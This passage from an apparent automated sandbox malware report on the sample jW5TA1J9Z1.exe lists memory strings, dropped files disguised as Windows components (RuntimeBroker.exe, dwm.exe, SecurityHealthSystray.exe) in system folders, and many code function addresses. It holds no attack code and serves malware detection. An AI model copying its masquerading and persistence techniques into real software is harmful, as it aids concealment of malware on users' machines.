00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\DiagTrack\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\DiagTrack\RuntimeBroker.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\DiagTrack\9e8d7a4ca61bd9Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exeJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\ServiceProfiles\3b1a2dfabaeac3Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\AppReadiness\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\AppReadiness\RuntimeBroker.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\AppReadiness\9e8d7a4ca61bd9Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMPJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACCE0D4C0_2_00007FFAACCE0D4C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACCE0E430_2_00007FFAACCE0E43
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAAD0DCDDD0_2_00007FFAAD0DCDDD
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAAD0DA69E0_2_00007FFAAD0DA69E
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB45142423_2_00007FFAAB451424
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB4513E023_2_00007FFAAB4513E0
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB4514AC23_2_00007FFAAB4514AC
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB45146823_2_00007FFAAB451468
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB45131423_2_00007FFAAB451314
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB4512D023_2_00007FFAAB4512D0
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB4502D323_2_00007FFAAB4502D3
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB45139C23_2_00007FFAAB45139C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB45135823_2_00007FFAAB451358
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB450E2623_2_00007FFAAB450E26
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB4514C123_2_00007FFAAB4514C1
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB47194523_2_00007FFAAB471945
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB47DA2423_2_00007FFAAB47DA24
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB481EFA23_2_00007FFAAB481EFA
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB481F5823_2_00007FFAAB481F58
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB440D4C23_2_00007FFAAB440D4C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB440E4323_2_00007FFAAB440E43
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB87A8A723_2_00007FFAAB87A8A7
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB83A69E23_2_00007FFAAB83A69E
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB96407923_2_00007FFAAB964079
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB963F6523_2_00007FFAAB963F65
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB96437A23_2_00007FFAAB96437A
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB965E5D23_2_00007FFAAB965E5D
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB962A7923_2_00007FFAAB962A79
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB96DA0523_2_00007FFAAB96DA05
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 24_2_00007FFAAB470D4C24_2_00007FFAAB470D4C
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 24_2_00007FFAAB470E4324_2_00007FFAAB470E43
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 27_2_00007FFAAB450D4C27_2_00007FFAAB450D4C
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 27_2_00007FFAAB450E4327_2_00007FFAAB450E43
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 30_2_00007FFAAB440D4C30_2_00007FFAAB440D4C
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 30_2_00007FFAAB440E4330_2_00007FFAAB440E43
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB48142431_2_00007FFAAB481424
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4813E031_2_00007FFAAB4813E0
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4814AC31_2_00007FFAAB4814AC
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB48146831_2_00007FFAAB481468
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB48131431_2_00007FFAAB481314
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4812D031_2_00007FFAAB4812D0
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4802D331_2_00007FFAAB4802D3
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB48139C31_2_00007FFAAB48139C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB48135831_2_00007FFAAB481358
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB480E2631_2_00007FFAAB480E26
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4814C131_2_00007FFAAB4814C1
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB470D4C31_2_00007FFAAB470D4C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB470E4331_2_00007FFAAB470E43
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4A171531_2_00007FFAAB4A1715
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4ADA2431_2_00007FFAAB4ADA24
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4A195831_2_00007FFAAB4A1958
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4A171532_2_00007FFAAB4A1715
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4ADA2432_2_00007FFAAB4ADA24
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4A195832_2_00007FFAAB4A1958
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB48142432_2_00007FFAAB481424
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4813E032_2_00007FFAAB4813E0
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4814AC32_2_00007FFAAB4814AC
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB48146832_2_00007FFAAB481468
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB48131432_2_00007FFAAB481314
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4812D032_2_00007FFAAB4812D0
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4802D332_2_00007FFAAB4802D3
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB48139C32_2_00007FFAAB48139C
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB48135832_2_00007FFAAB481358
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB480E2632_2_00007FFAAB480E26
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB4814C132_2_00007FFAAB4814C1
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB470D4C32_2_00007FFAAB470D4C
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 32_2_00007FFAAB470E4332_2_00007FFAAB470E43
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB45142433_2_00007FFAAB451424
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB4513E033_2_00007FFAAB4513E0
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB4514AC33_2_00007FFAAB4514AC
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB45146833_2_00007FFAAB451468
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB45131433_2_00007FFAAB451314
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB4512D033_2_00007FFAAB4512D0
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB4502D333_2_00007FFAAB4502D3
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB45139C33_2_00007FFAAB45139C
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB45135833_2_00007FFAAB451358
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB450E2633_2_00007FFAAB450E26
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB4514C133_2_00007FFAAB4514C1
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB47194533_2_00007FFAAB471945
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB47DA2433_2_00007FFAAB47DA24
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB440D4C33_2_00007FFAAB440D4C
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 33_2_00007FFAAB440E4333_2_00007FFAAB440E43
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 36_2_00007FFAAB430D4C36_2_00007FFAAB430D4C
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 36_2_00007FFAAB430E4336_2_00007FFAAB430E43
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB47194537_2_00007FFAAB471945
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB47DA2437_2_00007FFAAB47DA24
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB45142437_2_00007FFAAB451424
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB4513E037_2_00007FFAAB4513E0
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB4514AC37_2_00007FFAAB4514AC
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB45146837_2_00007FFAAB451468
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB45131437_2_00007FFAAB451314
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB4512D037_2_00007FFAAB4512D0
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB4502D337_2_00007FFAAB4502D3
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB45139C37_2_00007FFAAB45139C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB45135837_2_00007FFAAB451358
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB450E2637_2_00007FFAAB450E26
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB4514C137_2_00007FFAAB4514C1
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB440D4C37_2_00007FFAAB440D4C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 37_2_00007FFAAB440E4337_2_00007FFAAB440E43
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB46107C38_2_00007FFAAB46107C
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB460ED138_2_00007FFAAB460ED1
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB4602D338_2_00007FFAAB4602D3
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB450D4C38_2_00007FFAAB450D4C
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB450E4338_2_00007FFAAB450E43
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB48171538_2_00007FFAAB481715
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB48DA2438_2_00007FFAAB48DA24
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 38_2_00007FFAAB48195838_2_00007FFAAB481958
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB440D4C39_2_00007FFAAB440D4C
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB440E4339_2_00007FFAAB440E43
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB45142439_2_00007FFAAB451424
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB4513E039_2_00007FFAAB4513E0
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB4514AC39_2_00007FFAAB4514AC
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB45146839_2_00007FFAAB451468
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB45131439_2_00007FFAAB451314
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB4512D039_2_00007FFAAB4512D0
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB4502D339_2_00007FFAAB4502D3
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB45139C39_2_00007FFAAB45139C
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB45135839_2_00007FFAAB451358
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB450E2639_2_00007FFAAB450E26
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB4514C139_2_00007FFAAB4514C1
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB47194539_2_00007FFAAB471945
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 39_2_00007FFAAB47DA2439_2_00007FFAAB47DA24
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB470D4C40_2_00007FFAAB470D4C
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB470E4340_2_00007FFAAB470E43
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4A171540_2_00007FFAAB4A1715
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4ADA2440_2_00007FFAAB4ADA24
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4A195840_2_00007FFAAB4A1958
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB48142440_2_00007FFAAB481424
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4813E040_2_00007FFAAB4813E0
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4814AC40_2_00007FFAAB4814AC
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB48146840_2_00007FFAAB481468
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB48131440_2_00007FFAAB481314
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4812D040_2_00007FFAAB4812D0
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4802D340_2_00007FFAAB4802D3
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB48139C40_2_00007FFAAB48139C
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB48135840_2_00007FFAAB481358
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB480E2640_2_00007FFAAB480E26
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 40_2_00007FFAAB4814C140_2_00007FFAAB4814C1
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 41_2_00007FFAAB450D4C41_2_00007FFAAB450D4C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 41_2_00007FFAAB450E4341_2_00007FFAAB450E43
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 41_2_00007FFAAB48171541_2_00007FFAAB481715
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 41_2_00007FFAAB48DA2441_2_00007FFAAB48DA24
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 41_2_00007FFAAB48195841_2_00007FFAAB481958
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 41_2_00007FFAAB460ED141_2_00007FFAAB460ED1
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 41_2_00007FFAAB4602D341_2_00007FFAAB4602D3
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\DVfmUYdt.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                              Source: jW5TA1J9Z1.exe, 00000000.00000000.1237892460.0000000000812000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 0000001F.00000002.1802396882.00000000031F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.0000000003562000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.000000000356D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
                              Source: jW5TA1J9Z1.exe, 00000025.00000002.2124845618.0000000003616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs jW5TA1J9Z1.exe
